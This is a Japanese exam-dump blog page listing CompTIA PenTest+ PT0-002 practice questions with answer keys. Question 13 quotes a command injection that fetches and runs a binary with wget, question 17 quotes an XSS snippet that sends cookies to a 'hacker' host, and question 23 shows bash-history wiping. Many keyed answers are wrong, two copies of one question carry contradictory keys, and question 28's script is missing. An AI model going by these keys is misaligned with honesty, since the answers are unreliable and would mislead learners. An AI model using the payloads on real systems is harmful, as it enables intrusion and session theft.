• ホーム
  • ブログ
  • [2022年最新] 最高の試験PT0-002問題集は無料サイトの資料を試そう [Q13-Q36]

[2022年最新] 最高の試験PT0-002問題集は無料サイトの資料を試そう [Q13-Q36]

Share

[2022年最新] 最高の試験PT0-002問題集は無料サイトの資料を試そう

無料CompTIA PenTest+ PT0-002オフィシャル認証ガイドPDFをダウンロード

質問 13
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?

  • A. rm -rf /tmp/apache
  • B. grep -v apache ~/.bash_history > ~/.bash_history
  • C. taskkill /IM "apache" /F
  • D. chmod 600 /tmp/apache

正解: A

 

質問 14
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To determine any processes that failed to meet expectations during the assessment
  • B. To provide feedback on the report structure and recommend improvements
  • C. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • D. To discuss the findings and dispute any false positives

正解: A

 

質問 15
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.
Which of the following is MOST vulnerable to a brute-force attack?

  • A. WPA2-EAP
  • B. WPA2-PSK
  • C. WPS
  • D. WPA-TKIP

正解: C

 

質問 16
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  • A. Whether the cloud service provider allows the penetration tester to test the environment
  • B. The geographical location where the cloud services are running
  • C. Whether the specific cloud services are being used by the application
  • D. Whether the country where the cloud service is based has any impeding laws

正解: A

 

質問 17
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Input validation
  • D. Web-application firewall
  • E. Output encoding
  • F. Base64 encoding

正解: A,B

 

質問 18
A
penetration tester found the following valid URL while doing a manual assessment of a web application:
http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

  • A. DirBuster
  • B. Nikto
  • C. SQLmap
  • D. Nessus

正解: D

 

質問 19
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. Alternate data streams
  • C. PowerShell modules
  • D. MP4 steganography

正解: A

 

質問 20
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

  • A. Add a dependency checker into the tool chain.
  • B. Validate API security settings before deployment.
  • C. Perform fuzz testing of compiled binaries.
  • D. Perform routine static and dynamic analysis of committed code.

正解: C

 

質問 21
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team may have a history of selling exploits to third parties.
  • B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team will be given access to source code for analysis.

正解: A

 

質問 22
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.
Which of the following attack types is MOST concerning to the company?

  • A. Side channel
  • B. Session riding
  • C. Data flooding
  • D. Cybersquatting

正解: B

 

質問 23
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

  • A. Making decoy files on the system to confuse incident responders
  • B. Redirecting Bash history to /dev/null
  • C. Covering tracks by clearing the Bash history
  • D. Making a copy of the user's Bash history for further enumeration

正解: C

 

質問 24
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Using a brute-force attack against the external perimeter to gain a foothold
  • B. Dropping a malicious USB key with the company's logo in the parking lot
  • C. Attempting to tailgate an employee going into the client's workplace
  • D. Performing spear phishing against employees by posing as senior management

正解: A

 

質問 25
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen.
A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

  • A. Direct-to-origin
  • B. Credential harvesting
  • C. Cross-site scripting
  • D. Malware injection

正解: A

 

質問 26
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  • A. Tag nesting
  • B. Meta tagging
  • C. RFID tagging
  • D. RFID cloning

正解: B

 

質問 27
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. PBKDF2
  • B. bcrypt
  • C. SHA-1
  • D. MD5

正解: D

 

質問 28
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Create an encrypted tunnel.
  • D. Attempt to flood open ports.

正解: A

 

質問 29
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Halt the penetration test.
  • B. Assume the alert is from the penetration test.
  • C. Conduct an incident response.
  • D. Deconflict with the penetration tester.

正解: C

 

質問 30
Which of the following is the MOST effective person to validate results from a penetration test?

  • A. Chief Information Officer
  • B. Team leader
  • C. Client
  • D. Third party

正解: B

 

質問 31
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team will be given access to source code for analysis.
  • B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team may have a history of selling exploits to third parties.

正解: A

 

質問 32
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?

  • A. User hashes sent over SMB
  • B. Multiple handshakes
  • C. Encrypted file transfers
  • D. IP addresses

正解: A

 

質問 33
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nikto
  • D. Burp Suite
  • E. Nessus
  • F. Wireshark

正解: B,F

 

質問 34
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Ransomware attacks
  • C. Race-condition attacks
  • D. Zero-day attacks
  • E. Injection flaws
  • F. Cross-site scripting

正解: A,F

 

質問 35
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Inform the customer immediately about the backdoor
  • C. Forensically acquire the backdoor Trojan and perform attribution
  • D. Utilize the backdoor in support of the engagement

正解: B

 

質問 36
......

CompTIA PT0-002オフィシャル認証ガイドPDF:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

試験PT0-002のCompTIA PenTest+ Certificationの問題集にはここにある:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy

関するブログ

もっと
PT0-002無料問題集